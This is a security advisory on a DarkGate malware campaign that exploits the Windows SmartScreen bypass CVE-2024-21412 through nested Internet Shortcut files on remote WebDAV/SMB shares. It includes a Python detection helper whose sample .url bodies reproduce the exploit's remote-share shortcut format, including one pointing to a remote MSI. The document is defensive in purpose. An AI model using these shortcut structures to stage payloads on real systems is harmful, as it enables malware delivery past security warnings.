March 14, 2024
Severity
High
Analysis Summary
A new campaign propagating the DarkGate malware in multiple waves of attacks has been leveraging a now-patched Windows Defender SmartScreen security flaw to bypass security checks and automatically download malicious software installers.
SmartScreen is a Windows feature that adds a layer of security by displaying a warning whenever the user tries to run a suspicious or unrecognized file downloaded from the internet. The vulnerability in Windows Defender SmartScreen is tracked as CVE-2024-21412 and allows specially crafted downloaded files to bypass these security warnings. Threat actors exploit it by creating a Windows Internet Shortcut that points to another .url file hosted on a remote SMB share, causing the file at the final location to be executed automatically.
Microsoft released a patch for the vulnerability in mid-February after it was disclosed that the financially motivated advanced persistent threat (APT) group Water Hydra had exploited it as a zero-day to distribute its DarkMe malware onto traders' systems. Recently, researchers warned that the threat actors behind DarkGate are exploiting the same vulnerability to infect targeted machines.
The attack chain starts with a phishing email carrying a PDF attachment whose links abuse Google DoubleClick Digital Marketing (DDM) services as open redirects to bypass email security checks. When an unsuspecting user clicks a link, they are sent to a compromised web server hosting an internet shortcut file, which in turn links to another shortcut file hosted on an actor-controlled WebDAV server. Using one Windows shortcut to open a second one on a remote server exploits CVE-2024-21412 and causes a malicious MSI file to execute on the system automatically.
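The nested-shortcut chain above (a .url file whose target is another .url on a remote SMB or WebDAV share) leaves a recognisable pattern in the first shortcut's contents. The following detection helper is an added example, not code from the advisory: it parses the INI-style body of a Windows Internet Shortcut and flags remote file-share targets, with the nested .url case reported separately. The sample shortcut bodies and hosts (192.0.2.10, 198.51.100.5) are constructed for illustration.

```python
import re

# A remote file-share target: UNC path (\\host\share\...), //host/..., or file://host/...
# WebDAV-style hosts may carry an @SSL or @port suffix, which is stripped before checks.
REMOTE_RE = re.compile(r"^(?:\\\\|//|file://)(?P<host>[^\\/]+)[\\/](?P<path>.*)$", re.I)

def parse_url_file(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section of a .url body."""
    section = None
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()  # other sections (e.g. a CLSID block) are ignored
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip().lower()] = val.strip()
    return values

def classify_shortcut(text: str) -> str:
    """'nested-remote-url' when URL= points at another .url on a remote share (the
    CVE-2024-21412 chain), 'remote-target' for any other remote share target, else 'ok'."""
    target = parse_url_file(text).get("url", "").strip('"')
    m = REMOTE_RE.match(target)
    if not m:
        return "ok"  # http(s) links and local file:///C:/... paths are not remote shares
    host = m.group("host").split("@")[0].lower()
    if host in ("", "localhost", "127.0.0.1"):
        return "ok"
    if m.group("path").lower().endswith(".url"):
        return "nested-remote-url"
    return "remote-target"

# Constructed sample .url bodies (not artefacts from the campaign).
SAMPLES = {
    "benign": "[InternetShortcut]\r\nURL=https://example.com/docs\r\n",
    "chain": "[InternetShortcut]\r\nURL=file://192.0.2.10/share/second.url\r\n",
    "webdav": ("[{000214A0-0000-0000-C000-000000000046}]\r\nProp3=19,2\r\n"
               "[InternetShortcut]\r\nURL=\\\\192.0.2.10@80\\DavWWWRoot\\stage.url\r\nIDList=\r\n"),
    "remote_msi": "[InternetShortcut]\r\nURL=\\\\198.51.100.5\\pub\\setup.msi\r\n",
}

def scan_samples() -> dict:
    """Classify every constructed sample; real use would read .url files from a mailbox or share."""
    return {name: classify_shortcut(body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name}: {verdict}")
```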
The MSI files masquerade as legitimate software from NVIDIA, Notion, and Apple iTunes. Once the MSI installer runs, a DLL side-loading step involving a “libcef.dll” file and a loader named “sqlite3.dll” decrypts and finally executes the DarkGate malware payload on the device. After initialization, the malware is capable of data theft, fetching additional payloads, process injection, keylogging, and giving the threat actors real-time remote access.

The latest campaign uses DarkGate version 6.1.7, which features an XOR-encrypted configuration, updated command-and-control (C2) values, and configuration options that the older version 5 did not have. These new parameters let the operators select different operational tactics and evasion techniques, such as requiring a minimum disk size and RAM amount to avoid analysis environments, or enabling startup persistence. It is highly recommended to apply Microsoft's latest updates that patch CVE-2024-21412 to mitigate the risk posed by these attacks.
Impact
- Security Bypass
- Sensitive Data Theft
- Keylogging
- Unauthorized Access
Indicators of Compromise
Remediation
- Use Microsoft Automatic Update to apply the appropriate patch for your system, or the Microsoft Security Update Guide to search for available patches.
- Block all threat indicators at your respective controls.
- Search for Indicators of Compromise (IoCs) in your environment using your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement multi-factor authentication to add an extra layer of security to login processes.
- Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
- Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
- Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
- Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
- Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
- Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
- Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
- Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.